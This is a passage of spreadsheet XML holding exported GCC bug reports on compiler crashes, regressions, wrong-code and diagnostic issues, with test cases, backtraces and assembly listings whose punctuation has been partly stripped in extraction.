../gcc/testsuite/gcc.dg/vect/pr60656.c:21:1: note: vectorized 0 loops in function.
../gcc/testsuite/gcc.dg/vect/pr60656.c:27:3: note: not vectorized: loop contains function calls or data references that cannot be analyzed
../gcc/testsuite/gcc.dg/vect/pr60656.c:36:5: note: vectorized 0 loops in function.</t>
  </si>
  <si>
    <t>GCC-68024</t>
  </si>
  <si>
    <t>Diagnose variadic functions defined without prototypes</t>
  </si>
  <si>
    <t>As a quality-of-implementation-issue we should diagnose code such as:
void f (int ...)
void f (a) int a {}
which defines a variadic function without using ....
The types are compatible as defined by ISO C (see C11 6.7.6.3#15) so no diagnostic is required.  However this case is explicitly undefined behavior (C11 6.9.1#8: If a function that accepts a variable number of arguments is defined without a parameter type list that ends with the ellipsis notation the behavior is undefined. likewise back to C90).  So it is valid to reject it (this is undefined behavior as a property of a program not of a particular execution of a program) and certainly seems a good idea at least to give a diagnostic.
This showed up with such a (declaration definition) pair in glibc only being diagnosed after converting the definition from K&amp;R style to prototype-style.</t>
  </si>
  <si>
    <t>GCC-8573</t>
  </si>
  <si>
    <t>gnats likes to make new prs instead of appending to old ones.</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-15416</t>
  </si>
  <si>
    <t>Can't bootstrap the gcc-3.5 Ada compiler</t>
  </si>
  <si>
    <t>Please close this PR when Ada frontend works again.
Thanks!</t>
  </si>
  <si>
    <t>berndtrog</t>
  </si>
  <si>
    <t>GCC-44777</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE: SIGSEGV with -fprofile-use in gcc.c-torture/execute/comp-goto-2.c</t>
  </si>
  <si>
    <t>Command line:
$ rm *.gcda
$ gcc -fprofile-generate comp-goto-2.c &amp;&amp; ./a.out &amp;&amp; gcc -fprofile-use comp-goto-2.c
Compiler output (with valgrind):
$ valgrind -q --trace-children=yes /mnt/svn/gcc-trunk/binary-161659-lto-fortran-checking-yes-rtl-df/bin/gcc -fprofile-use testcase.c
comp-goto-2.c: In function 'main':
comp-goto-2.c:33:5: warning: incompatible implicit declaration of built-in function 'abort' [enabled by default]
comp-goto-2.c:35:3: warning: incompatible implicit declaration of built-in function 'exit' [enabled by default]
==8841== Invalid read of size 8
==8841==    at 0x8AB2C0: gimple_block_ends_with_call_p (gimple.h:4660)
==8841==    by 0x7D303D: is_edge_inconsistent (profile.c:282)
==8841==    by 0x7D3507: compute_branch_probabilities (profile.c:325)
==8841==    by 0x7D4CE6: branch_prob (profile.c:1175)
==8841==    by 0x9157D5: tree_profiling (tree-profile.c:477)
==8841==    by 0x7BA39B: execute_one_pass (passes.c:1565)
==8841==    by 0x7BA634: execute_pass_list (passes.c:1620)
==8841==    by 0x7B989B: do_per_function_toporder (passes.c:1158)
==8841==    by 0x7BAA45: execute_ipa_pass_list (passes.c:1920)
==8841==    by 0xAAFCC0: cgraph_optimize (cgraphunit.c:1851)
==8841==    by 0xAAFF1A: cgraph_finalize_compilation_unit (cgraphunit.c:1171)
==8841==    by 0x4DD812: c_write_global_declarations (c-decl.c:9698)
==8841==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==8841== 
comp-goto-2.c: In function 'y':
comp-goto-2.c:36:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Testcase is gcc.c-torture/execute/comp-goto-2.c</t>
  </si>
  <si>
    <t>GCC-15164</t>
  </si>
  <si>
    <t>trans-decl.c:411: gfc_finish_var_decl: Assertion failed</t>
  </si>
  <si>
    <t>f951: ../../gcc/gcc/fortran/trans-decl.c:411: gfc_finish_var_decl:
Assertion `current_function_decl == (tree) ((void *)0)' failed.
Source code (id31sum.f90) was posted to:
http://gcc.gnu.org/ml/gcc-bugs/2004-04/msg02162.html 
Other fortran compilers (including g95) manage to compile the code and I did
not figure out what the specific problem is here. 
Output when compiling:
crunch:~/nuweb/bug % /users/wright/gfortran//gcc-ssa/bin/gfortran -v -save-temps
id31sum.f90
Driving: /users/wright/gfortran//gcc-ssa/bin/gfortran -v -save-temps id31sum.f90
 -lgfortranbegin -lgfortran -lm -shared-libgcc
Reading specs from
/users/wright/gfortran/gcc-ssa/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/specs
Configured with: ../gcc/configure --disable-checking --prefix=/tmp/gcc-ssa --ena
ble-languages=cc++f95 --with-gmp=/usr
Thread model: posix
gcc version 3.5-tree-ssa 20040423 (merged 20040414)
 /users/wright/gfortran/gcc-ssa/bin/../libexec/gcc/i686-pc-linux-gnu/3.5-tree-ss
a/f951 id31sum.f90 -quiet -dumpbase id31sum.f90 -mtune=pentiumpro -auxbase id31s
um -version -o id31sum.s
GNU F95 version 3.5-tree-ssa 20040423 (merged 20040414) (i686-pc-linux-gnu)
        compiled by GNU C version 3.5-tree-ssa 20040423 (merged 20040414).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
f951: ../../gcc/gcc/fortran/trans-decl.c:411: gfc_finish_var_decl: Assertion `cu
rrent_function_decl == (tree) ((void *)0)' failed.
id31sum.f90: In function `split':
id31sum.f90:73: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>wright</t>
  </si>
  <si>
    <t>GCC-47568</t>
  </si>
  <si>
    <t>Name lookup: different behavior 4.1.2 / 4.5.0</t>
  </si>
  <si>
    <t>Created attachment 23193
test
There is different behavior with the attached code.
when compiled with 4.1.2:
assign 1
assign 1
when compiled with 4.5.0:
assign 1
assign a
Versions:
g++-4.1 (GCC) 4.1.2 20070115 (prerelease) (SUSE Linux)
gcc (SUSE Linux) 4.5.0 20100604 [gcc-4_5-branch revision 160292]
I don't know which behaviors are supported by other versions but I think that the only one of them is right.</t>
  </si>
  <si>
    <t>matwey.kornilov</t>
  </si>
  <si>
    <t>GCC-8238</t>
  </si>
  <si>
    <t>cout incorrectly promotes ptrs in casted values</t>
  </si>
  <si>
    <t>The following code prints a full 4 byte int (long) vs. just printing the first char's ascii value (like it should):
#include 
main()
{
        unsigned char c=255
        char *p
        p=reinterpret_cast(
        cout(*p)&lt;&lt;endl
}
Release:
GCC 2.95.3 (FreeBSD i386)
Environment:
FreeBSD 7of9 4.6-RELEASE FreeBSD 4.6-RELEASE #1: Sun Sep 22 23:02:44 GMT 2002     root@7of9:/usr/src/sys/compile/ANNICA  i386
How-To-Repeat:
try any ref to a char * in a cout</t>
  </si>
  <si>
    <t>aryeh</t>
  </si>
  <si>
    <t>GCC-67203</t>
  </si>
  <si>
    <t>[6 regression] FAIL: g++.dg/tree-ssa/pr61034.C  -std=gnu++11  scan-tree-dump-times fre2 free 10</t>
  </si>
  <si>
    <t>Broken by r226852.
$ gcc/xg++ -Bgcc/ ../gcc/testsuite/g++.dg/tree-ssa/pr61034.C -nostdinc++ -Iia64-suse-linux/libstdc++-v3/include/ia64-suse-linux -Iia64-suse-linux/libstdc++-v3/include -I../libstdc++-v3/libsupc++ -I../libstdc++-v3/include/backward -I../libstdc++-v3/testsuite/util -std=gnu++11 -O3 -fdump-tree-fre2 -S -o pr61034.s
$ grep -c free *.fre2
14</t>
  </si>
  <si>
    <t>GCC-5811</t>
  </si>
  <si>
    <t>[i386-unknown-freebsd4.5] make compare fails when built with BSD make</t>
  </si>
  <si>
    <t>When i build the gcc-3.0.4 with BSD make the make compare fails. If i build with gmake the make compare succeeds.
The build was configured with:
../../../gcc-3.0.4/configure --prefix=/usr/local/gcc304
and built with:
make CFLAGS=-v -save-temps BOOT_CFLAGS=-v -save-temps bootstrap
The compare fails at:
rm -f .bad_compare
case compare in compare | compare-lean ) stage=2  * ) stage=`echo compare | sed -e 's^compare\([0-9][0-9]*\).*\1'`  esac  for file in *.o do  tail +16c ./$file &gt; tmp-foo1  tail +16c stage$stage/$file &gt; tmp-foo2    done
case compare in compare | compare-lean ) stage=2  * ) stage=`echo compare | sed -e 's^compare\([0-9][0-9]*\).*\1'`  esac  for dir in tmp-foo intl cp f java objc do  if [ `echo $dir/*.o` != $dir/*.o ]  then  for file in $dir/*.o do  tail +16c ./$file &gt; tmp-foo1  tail +16c stage$stage/$file &gt; tmp-foo2    done  else true fi  done
rm -f tmp-foo*
case compare in compare | compare-lean ) stage=2  * ) stage=`echo compare | sed -e 's^compare\([0-9][0-9]*\).*\1'`  esac  if [ -f .bad_compare ] then  echo Bootstrap comparison failure!  cat .bad_compare  exit 1  else  case compare in  *-lean ) rm -rf stage$stage   *)   esac true  fi
Bootstrap comparison failure!
underscore.o differs
*** Error code 1
Stop in /usr/local/tools/build/gcc/native/gcc.
Release:
gcc-3.0.4
Environment:
FreeBSD killerqueen 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sun Feb  3 16:45:56 CET 2002     root@killerqueen:/usr/src/sys/compile/KERNEL  i386
How-To-Repeat:
bootstrap on a FreeBSD machine with BSD make. Do a make compare.</t>
  </si>
  <si>
    <t>macklobell</t>
  </si>
  <si>
    <t>GCC-81006</t>
  </si>
  <si>
    <t>ICE with zero-size array and #pragma omp task depend</t>
  </si>
  <si>
    <t>The following (valid?) testcase triggers an ICE since GCC 4.9.0
(when compiled with -fopenmp):
===================================================
int a[] = {}
void foo()
{
  #pragma omp task depend(out: a[:])
    {}
}
===================================================
bug.c: In function 'foo':
bug.c:5:11: internal compiler error: in size_binop_loc at fold-const.c:1770
   #pragma omp task depend(out: a[:])
           ^~~
0x885b57 size_binop_loc(unsigned int tree_code tree_node* tree_node*)
	../../gcc/gcc/fold-const.c:1769
0x6237da handle_omp_array_sections_1
	../../gcc/gcc/c/c-typeck.c:12365
0x62431d handle_omp_array_sections
	../../gcc/gcc/c/c-typeck.c:12508
0x6287a8 c_finish_omp_clauses(tree_node* c_omp_region_type)
	../../gcc/gcc/c/c-typeck.c:13334
0x63684e c_parser_omp_task
	../../gcc/gcc/c/c-parser.c:15713
0x63684e c_parser_omp_construct
	../../gcc/gcc/c/c-parser.c:17405
0x63789e c_parser_pragma
	../../gcc/gcc/c/c-parser.c:10393
0x655f5d c_parser_compound_statement_nostart
	../../gcc/gcc/c/c-parser.c:4892
0x65653e c_parser_compound_statement
	../../gcc/gcc/c/c-parser.c:4757
0x6527e7 c_parser_declaration_or_fndef
	../../gcc/gcc/c/c-parser.c:2125
0x65a223 c_parser_external_declaration
	../../gcc/gcc/c/c-parser.c:1468
0x65ac89 c_parser_translation_unit
	../../gcc/gcc/c/c-parser.c:1349
0x65ac89 c_parse_file()
	../../gcc/gcc/c/c-parser.c:18131
0x6b8566 c_common_parse_file()
	../../gcc/gcc/c-family/c-opts.c:1104
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-77874</t>
  </si>
  <si>
    <t>two problems with gcc.target/i386/avx-1.c</t>
  </si>
  <si>
    <t>$ ~/gcc/results/bin/gcc -c gcc.target/i386/avx-1.c
/tmp/cc1rwjfP.s: Assembler messages:
/tmp/cc1rwjfP.s:83150: Error: operand size mismatch for `vcvtqq2pd'
/tmp/cc1rwjfP.s:83183: Error: operand size mismatch for `vcvtqq2pd'
/tmp/cc1rwjfP.s:83216: Error: operand size mismatch for `vcvtqq2pd'
/tmp/cc1rwjfP.s:83245: Error: operand size mismatch for `vcvtuqq2pd'
/tmp/cc1rwjfP.s:83278: Error: operand size mismatch for `vcvtuqq2pd'
/tmp/cc1rwjfP.s:83311: Error: operand size mismatch for `vcvtuqq2pd'
$
I am not sure if the assembler is in error or the compiler.
$ ~/gcc/results/bin/gcc -c -O3 -march=native gcc.target/i386/avx-1.c
In file included from /home/dcb/gcc/results/lib/gcc/x86_64-pc-linux-gnu/7.0.0/include/immintrin.h:53:0
                 from gcc.target/i386/avx-1.c:583:
/home/dcb/gcc/results/lib/gcc/x86_64-pc-linux-gnu/7.0.0/include/avx512vlintrin.h: In function â€˜_mm_mask_and_epi32â€™:
/home/dcb/gcc/results/lib/gcc/x86_64-pc-linux-gnu/7.0.0/include/avx512vlintrin.h:4766:1: internal compiler error: in output_3399 at config/i386/sse.md:11423
 }
 ^
0x128e276 output_3399
	../../trunk/gcc/config/i386/sse.md:11423
0x8ee6e2 final_scan_insn(rtx_insn* _IO_FILE* int int int*)
	../../trunk/gcc/final.c:2978
0x8ef872 final(rtx_insn* _IO_FILE* int)
	../../trunk/gcc/final.c:2045
0x8f03ed rest_of_handle_final
	../../trunk/gcc/final.c:4471
0x8f03ed execute
	../../trunk/gcc/final.c:4546
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat /proc/cpuinfo 
processor	: 7
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 2
model name	: AMD FX(tm)-8350 Eight-Core Processor
stepping	: 0
microcode	: 0x600084f
cpu MHz		: 4000.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 3
cpu cores	: 4
apicid		: 23
initial apicid	: 7
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf eagerfpu pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb cpb hw_pstate vmmcall bmi1 arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bugs		: fxsave_leak sysret_ss_attrs null_seg
bogomips	: 8025.66
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro</t>
  </si>
  <si>
    <t>GCC-1733</t>
  </si>
  <si>
    <t>C++ ICE in copy_body_r with optimization on</t>
  </si>
  <si>
    <t>G++ crashes on the source below when the -O switch is used.
The workaround i've been using is to compile the affected modules
without optimization.
Release:
2.97 20010122 (experimental)
Environment:
System: Linux karma 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix
How-To-Repeat:
-----------------------------------------------------
struct TBtItem
{
   TBtItem()
}
struct TBtInnerNode
{
   TBtInnerNode()
   int     MaxIndex() const { return 10 }
}
TBtInnerNode::TBtInnerNode()
{
   new TBtItem[MaxIndex()+1]
}
-----------------------------------------------------
$ ./cc1plus -O x.cc
 int TBtInnerNode::MaxIndex() const TBtInnerNode::TBtInnerNode() TBtInnerNode::TBtInnerNode() TBtInnerNode::TBtInnerNode() TBtInnerNode::TBtInnerNode()
x.cc:10: Internal compiler error in copy_body_r at cp/optimize.c:317
Please submit a full bug report.
 See  for instructions.</t>
  </si>
  <si>
    <t>GCC-62107</t>
  </si>
  <si>
    <t>libgomp.fortran/target2.f90 error while compiling for OpenMP 4.0 offload target</t>
  </si>
  <si>
    <t>To reproduce with trunk GCC:
gfortran -fopenmp libgomp/testsuite/libgomp.fortran/target2.f90
Reduced testcase:
module target2
contains
  subroutine foo (a)
    integer pointer :: a
    logical :: r
    !$omp target map (to: a) map (from: r)
      r = a /= 1
    !$omp end target
    if (r) call abort
  end subroutine foo
end module target2
  use target2 only : foo
  integer pointer :: a
  allocate (a)
  a = 1
  call foo (a)
end
GIMPLE for reduced testcase:
foo (integer(kind=4) * &amp; a)
{
  integer(kind=4) * 
  logical(kind=4) r.4
  logical(kind=4) r
  try
    {
      a.1 = a
      // Looks like the map clause for data pointed by 'a' is missed
      #pragma omp target map(to:*a.1 [len: 8]) map(alloc:a [pointer assign bias: 0]) map(from:r [len: 4])
        {
          {
            integer(kind=4) * 
            integer(kind=4) * D.2342
            integer(kind=4) D.2343
            logical(kind=4) r.3
            a.2 = a
            D.2342 = *a.2
            D.2343 = *D.2342
            r.3 = D.2343 != 1
            r = r.3
          }
        }
      r.4 = r
      if (r.4 != 0) goto  else goto 
      :
      _gfortran_abort ()
      :
      L.1:
    }
  finally
    {
      r = {CLOBBER}
    }
}</t>
  </si>
  <si>
    <t>andrey.turetskiy</t>
  </si>
  <si>
    <t>GCC-28054</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with friend declaration of invalid bitfield</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on mainline:
============================================
struct A
struct B
{
    friend A : 2
}
============================================
bug.cc:5: error: name 'A' has incomplete type
bug.cc:5: internal compiler error: tree check: expected tree that contains 'decl common' structure have 'error_mark'  in grokbitfield at cp/decl2.c:970
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-66749</t>
  </si>
  <si>
    <t>[4.9/5/6] gcc.target/i386/addr-sel-1.c fails to merge array index into one instruction with -m32 -mregparm=3 or with -miamcu</t>
  </si>
  <si>
    <t>The test tries to generate code for:
return a[i+1] + b[i+1]
For -m32 gcc generates proper code:
movl    4(%esp) %eax
movsbl  a+1(%eax) %ecx
movsbl  b+1(%eax) %eax
addl    %ecx %eax
However with -m32 -mregparm=3 the b value fails to be combined:
movsbl  a+1(%eax) %edx
incl    %eax
movsbl  b(%eax) %eax
addl    %edx %eax
The error also remains with -mregparm=1/2 or with -miamcu.</t>
  </si>
  <si>
    <t>GCC-7967</t>
  </si>
  <si>
    <t>optimization produces wrong code (ARM)</t>
  </si>
  <si>
    <t>Compiling following peace of code for an ARM processor (with optimization) produces wrong code.
This is true with gcc-3.0.4 and gcc-3.2
The file in the 'HowToRepeat' section produces :
root:~# gcc -O1 -v test.c
Reading specs from /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/specs
Configured with: ../gcc-3.2/configure --prefix=/usr/local/gcc-3.2 --with-cpu=xscale --enable-languages=cc++
Thread model: posix
gcc version 3.2
 /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/cc1 -lang-c -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__ELF__ -D__unix -D__linux -Asystem=unix -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=arm -Amachine=arm -D__ARM_ARCH_5TE__ -D__XSCALE__ -D__APCS_32__ -D__ARMEL__ -D__arm__ test.c -quiet -dumpbase test.c -O1 -version -o /tmp/cce7i9ST.s
GNU CPP version 3.2 (cpplib) (ARM GNU/Linux with ELF)
GNU C version 3.2 (armv5l-unknown-linux-gnu)
	compiled by GNU C version 3.0.4.
ignoring nonexistent directory /usr/local/gcc-3.2/armv5l-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/gcc-3.2/include
 /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/include
 /usr/include
End of search list.
 as -o /tmp/cccJot3S.o /tmp/cce7i9ST.s
 /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/collect2 -dynamic-linker /lib/ld-linux.so.2 -X -m armelf_linux -p /usr/lib/crt1.o /usr/lib/crti.o /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/crtbegin.o -L/usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2 -L/usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/../../.. /tmp/cccJot3S.o -lgcc -lgcc_eh -lc -lgcc -lgcc_eh /usr/local/gcc-3.2/lib/gcc-lib/armv5l-unknown-linux-gnu/3.2/crtend.o /usr/lib/crtn.o
root:~# ./a.out       
expect 0 : 0
expect 1 : 1
expect 2 : 2
expect 3 : 3
root:~# gcc -O2 test.c
root:~# ./a.out
expect 0 : 0
expect 1 : 3
expect 2 : 0
expect 3 : 3
The problem appears to be a mixup of the condition codes set by 
a 'tst' and an 'ands' as the .s from the 'bar' function indicates :
bar:
@ args = 0 pretend = 0 frame = 0
@ frame_needed = 0 uses_anonymous_args = 0
@ link register save eliminated.
        cmp     r0 #1
@ lr needed for prologue
        mov     r0 #0  
        bxne    lr
        tst     r2 #3      **** Set CC
        ands    r0 r1 #3  **** Overrule CC
	movne	r0 #1
	orrne	r0 r0 #2  **** should use CC set by 'tst'
	bx	lr
.Lfe2:
	.size	bar.Lfe2-bar
	.ident	GCC: (GNU) 3.2
Release:
gcc-3.2
Environment:
Linux xingu-07 2.4.16-rmk1-xng1 #38 Mon Jul 8 16:09:28 CEST 2002 armv5l unknown
host: armv5l-unknown-linux-gnu
build: armv5l-unknown-linux-gnu
How-To-Repeat:
/* reproduce with : */
/* gcc -O2 test.c */
#include 
int bar(int sint motion_x int motion_y)
int main(int argc char* argv[])
{
  printf(expect %d : %d\n 0 bar(100))
  printf(expect %d : %d\n 1 bar(110))
  printf(expect %d : %d\n 2 bar(101))
  printf(expect %d : %d\n 3 bar(111))
}
int bar(int sint motion_x int motion_y)
{
  int dxy
  dxy = 0
  if (s == 1)  {
    if ((motion_x &amp; 3) != 0) {
      dxy |= 1
    }
    if ((motion_y &amp; 3) != 0) {
      dxy |= 2
    }
  } else {
  }  
   return dxy
}</t>
  </si>
  <si>
    <t>jeroen.dobbelaere</t>
  </si>
  <si>
    <t>GCC-20815</t>
  </si>
  <si>
    <t>-fprofile-use barfs with coverage mismatch for function '...' while reading counter 'arcs'.</t>
  </si>
  <si>
    <t>This problem is present in at least gcc-3.4.[123] gcc-3.4-20050401 and
gcc-4.0-20050305.  I have not tested a later gcc-4.0 yet.
Create a test file pgo.cc:
 #include 
 namespace {
   void
   func() {
     std::cout &lt;&lt; In func &lt;&lt; std::endl
   }
 }
 int main() { func() } 
Compile it run it and recompile it as follows:
  i686-unknown-linux-gnu-g++  -fprofile-generate -o pgo pgo.cc 
  ./pgo
  i686-unknown-linux-gnu-g++  -fprofile-use -o pgo pgo.cc 
The -fprofile-use compilation fails with
pgo.cc: In function 'void::func()':
pgo.cc:6: error: coverage mismatch for function
'_ZN35_GLOBAL__N_pgo.cc_00000000_8B40D3D54funcEv' while reading counter 'arcs'.
pgo.cc:6: error: checksum is 5c057dbb instead of 3746c244
Commenting out the namespace makes the problem go away.
This keeps me from building some real apps with profile-driven optimization
which may result in switching from gcc to icc for this app.
Thanks to Simon Baldwin for finding such a nice little test case for this.</t>
  </si>
  <si>
    <t>GCC-52353</t>
  </si>
  <si>
    <t>-ftrapv -fnon-call-exceptions does not work</t>
  </si>
  <si>
    <t>The testcase from PR47086
void
foo ()
{
  int n = 0
  while (1)
    {
      int i[n % 1]
      n++
    }
}
reveals that while on the tree level n++ has an outgoing EH edge RTL
expansion leaves us with
 n_5 = n_1 + 1
(insn 12 11 13 (set (reg:DI 67)
        (sign_extend:DI (reg/v:SI 61 [ n ]))) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (nil))
(insn 13 12 14 (set (reg:DI 4 si)
        (const_int 1 [0x1])) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (nil))
(insn 14 13 15 (set (reg:DI 5 di)
        (reg:DI 67)) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (nil))
(call_insn/u 15 14 16 (set (reg:DI 0 ax)
        (call (mem:QI (symbol_ref:DI (__addvdi3) [flags 0x41]) [0 S1 A8])
            (const_int 0 [0]))) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (expr_list:REG_EH_REGION (const_int -2147483648 [0xffffffff80000000])
        (nil))
    (expr_list:REG_DEP_TRUE (use (reg:DI 4 si))
        (expr_list:REG_DEP_TRUE (use (reg:DI 5 di))
            (nil))))
(insn 16 15 17 (set (reg:DI 68)
        (reg:DI 0 ax)) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (expr_list:REG_EQUAL (plus:DI (reg:DI 67)
            (const_int 1 [0x1]))
        (nil)))
(insn 17 16 0 (set (reg/v:SI 63 [ n ])
        (subreg:SI (reg:DI 68) 0)) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (nil))
note that the call is marked CONST.  The EH edge is simply thrown away:
 Basic block 4  prev 3 next 5 loop_depth 1 count 0 freq 10000 maybe hot flags: new reachable rtl modified.
 Predecessors:  3 [100.0%]  (fallthru) 5 [100.0%]  (dfs_back)
...
(call_insn/u 15 14 16 4 (set (reg:DI 0 ax)
        (call (mem:QI (symbol_ref:DI (__addvdi3) [flags 0x41]) [0 S1 A8])
            (const_int 0 [0]))) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (expr_list:REG_EH_REGION (const_int -2147483648 [0xffffffff80000000])
        (nil))
    (expr_list:REG_DEP_TRUE (use (reg:DI 4 si))
        (expr_list:REG_DEP_TRUE (use (reg:DI 5 di))
            (nil))))
(insn 16 15 17 4 (set (reg:DI 68)
        (reg:DI 0 ax)) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (expr_list:REG_EQUAL (plus:DI (reg:DI 67)
            (const_int 1 [0x1]))
        (nil)))
(insn 17 16 18 4 (set (reg/v:SI 63 [ n ])
        (subreg:SI (reg:DI 68) 0)) /space/rguenther/src/svn/trunk/gcc/testsuite/gcc.dg/pr47086.c:11 -1
     (nil))
 Successors:  5 [100.0%]  (fallthru)
So we seem to leave around the libcall because of the EH side-effect
but do not consider that call as possibly throwing (as it is marked
nothrow on RTL) in find_many_sub_basic_blocks
(at least) and DCE it later too (sounds similar to PR19020).
Currently generated assembly for gcc.dg/pr47086.c on x86_64 is
foo:
.LFB0:
        .cfi_startproc
        .cfi_personality 0x3__gcc_personality_v0
        pushq   %rbx
        .cfi_def_cfa_offset 16
        .cfi_offset 3 -16
        movl    $0 %ebx
.L2:
        addl    $1 %ebx
        jmp     .L2
I'm running into this issue when removing unreachable blocks during
expansion then the landing pad unwind info expansion ICEs because the landing
pad was removed.
We mark the call as not throwing via emit_libcall_block because we pass
it (plus (reg) 1) as EQUIV which may not trap.</t>
  </si>
  <si>
    <t>GCC-3398</t>
  </si>
  <si>
    <t>using with member-function template</t>
  </si>
  <si>
    <t>// generate ICE:
struct A {
template  void f (T)
}
class B : A {
template  using A::f 
}
Release:
2.95.2 19991024
Environment:
Linux PPC
How-To-Repeat:
Recompile the program above.
I'm not 100% sure my source is legal so maybe the
category should be ice-on-illegal-code.</t>
  </si>
  <si>
    <t>mps</t>
  </si>
  <si>
    <t>GCC-54427</t>
  </si>
  <si>
    <t>Expose more vector extensions</t>
  </si>
  <si>
    <t>Hello
for gcc's vector extension to be really useful we need a way to access a large enough subset of operations on vectors in a target-independent way. C exposes comparisons ( &gt;= == !=) and shifts (&gt;) but C++ doesn't. Either these operators should be implemented in the C++ front-end as well or some builtins should be provided with the same role (__builtin_vec_less?).</t>
  </si>
  <si>
    <t>glisse</t>
  </si>
  <si>
    <t>GCC-26296</t>
  </si>
  <si>
    <t>[4.2 Regression] ACATS ICE cxg2007 cxg2012 verify_flow_info failed</t>
  </si>
  <si>
    <t>This was working as of
Mon Feb  6 21:17:18 UTC 2006 (revision 110664)
It's now FAIL on x86_64 (at least)
Tue Feb 14 21:54:03 UTC 2006 (revision 110997)
Note might be a resurgence of PR21241 (fixed a while ago).
cxg2007.adb: In function 'CXG2007':
cxg2007.adb:291: error: missing REG_EH_REGION note in the end of bb 162
+===========================GNAT BUG DETECTED==============================+
| 4.2.0 20060214 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| verify_flow_info failed                                                  |
| Error detected at cxg2007.adb:291:5                                      |
cxg2012.adb: In function 'CXG2012.A_LONG_FLOAT_CHECK.LARGE_RANGE_TEST':
cxg2012.adb:335: error: missing REG_EH_REGION note in the end of bb 33
+===========================GNAT BUG DETECTED==============================+
| 4.2.0 20060214 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| verify_flow_info failed                                                  |
| Error detected at cxg2012.adb:438:5                                      |</t>
  </si>
  <si>
    <t>GCC-17521</t>
  </si>
  <si>
    <t>internal compiler error: in make_decl_rtl at varasm.c:758</t>
  </si>
  <si>
    <t>An internal compiler error comes with a compilation with gfortran (3.5 from
debian experimental).
Message from the compiler:
gfortran-3.5 -O -c lec_fich.f90
lec_fich.f90: In function `lecture_fich_col':
lec_fich.f90:0: internal compiler error: in make_decl_rtl at varasm.c:758
Please submit a full bug report
I join the source file:
module lec_fich
  use nrtype
  implicit none
  private
  public :: lecture_fich_col
  integer(kind=i4b)private :: n_comment
contains
  subroutine lecture_fich_col (nomfichtab)
    use nrtype
!    implicit none
!!$! Variables d'entrÃ©es/sorties
!!$!----------------------------
    character(len=*) intent(in) :: nomfich
    real(kind=sp) dimension(::)intent(out) :: tab
!!$! Variables locales
!!$!------------------
    integer(kind=i4b) :: ijerr1
    character(len=1) :: comment
    open
(unit=1file=nomfichform=formattedstatus=oldaction=readiostat=err1position=rewind
)
    if (err1 /= 0) then
       print* erreur d'ouverture du fichier nomfich
       stop
    end if
    do i=1n_comment
       read (unit=1fmt=*) comment
    end do
    do i=1size(tab1)
       read (unit=1fmt=*) (tab(ij)j=1size(tab2))
    end do
    close (unit=1)
    return
  end subroutine lecture_fich_col
end module lec_fich
Thanks for your work :)</t>
  </si>
  <si>
